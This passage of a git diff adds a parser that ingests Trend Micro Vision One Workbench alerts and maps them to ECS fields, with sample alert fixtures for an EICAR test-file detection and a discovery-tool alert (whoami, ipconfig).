000000000..11bddf32c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml new file mode 100644 index 000000000..2f93f2919 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml @@ -0,0 +1,39 @@ +action.properties.ScriptBlockText: + description: '' + name: action.properties.ScriptBlockText + type: keyword + +trendmicro.vision_one.alert_id: + description: '' + name: trendmicro.vision_one.alert_id + type: keyword + +trendmicro.vision_one.case_id: + description: '' + name: trendmicro.vision_one.case_id + type: keyword + +trendmicro.vision_one.detection_name: + description: '' + name: trendmicro.vision_one.detection_name + type: keyword + +trendmicro.vision_one.incident_id: + description: '' + name: trendmicro.vision_one.incident_id + type: keyword + +trendmicro.vision_one.investigation_status: + description: '' + name: trendmicro.vision_one.investigation_status + type: keyword + +trendmicro.vision_one.severity: + description: '' + name: trendmicro.vision_one.severity + type: keyword + +trendmicro.vision_one.status: + description: '' + name: trendmicro.vision_one.status + type: keyword diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png new file mode 100644 index 000000000..e51bb3eb7 Binary files /dev/null and b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png differ diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml new file mode 100644 index 000000000..014352012 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml @@ -0,0 +1,12 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 +name: Trend Micro Vision One Workbench Alerts [BETA] +slug: trend-micro-vision-one-workbench-alerts + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + This intake format will ingest Workbench Alerts from Trend Micro Vision One. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json new file mode 100644 index 000000000..742eee7cc --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json @@ -0,0 +1,10 @@ +[ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml new file mode 100644 index 000000000..f5859582b --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml @@ -0,0 +1,102 @@ +name: trend-micro-vision-one-workbench +ignored_values: [] +pipeline: + - name: parsed_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + output_field: message + + - name: set_ecs_fields + +stages: + set_ecs_fields: + actions: + - set: + event.kind: alert + event.category: ["intrusion_detection"] + event.type: ["info"] + observer.vendor: "TrendMicro" + observer.product: "Vision One" + + event.reason: "{{parsed_event.message.model}}" + + - set: + "@timestamp": "{{parsed_event.message.createdDateTime}}" + + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}" + host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}" + + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}" + + rule.name: "{{parsed_event.message.model}}" + rule.id: "{{parsed_event.message.model.modelId}}" + + event.url: "{{parsed_event.message.workbenchLink}}" + event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}" + + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\') | last}}" + user.domain: "{{final.user.id.split('\\\\') | first}}" + filter: "{{final.user.id != null}}" + + - set: + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}" + + process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}" + + process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}" + process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}" + + - set: + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}" + registry.path: > + {%- set path = [] -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} + + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}" + + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}" + + user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}" + + - set: + action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}" + + - set: + trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" + trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" + trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" + trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" + trendmicro.vision_one.status: "{{parsed_event.message.status}}" + trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" + trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}" diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json new file mode 100644 index 000000000..53813871b --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json @@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "action": "File quarantined", + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json new file mode 100644 index 000000000..edbe26be4 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json @@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": 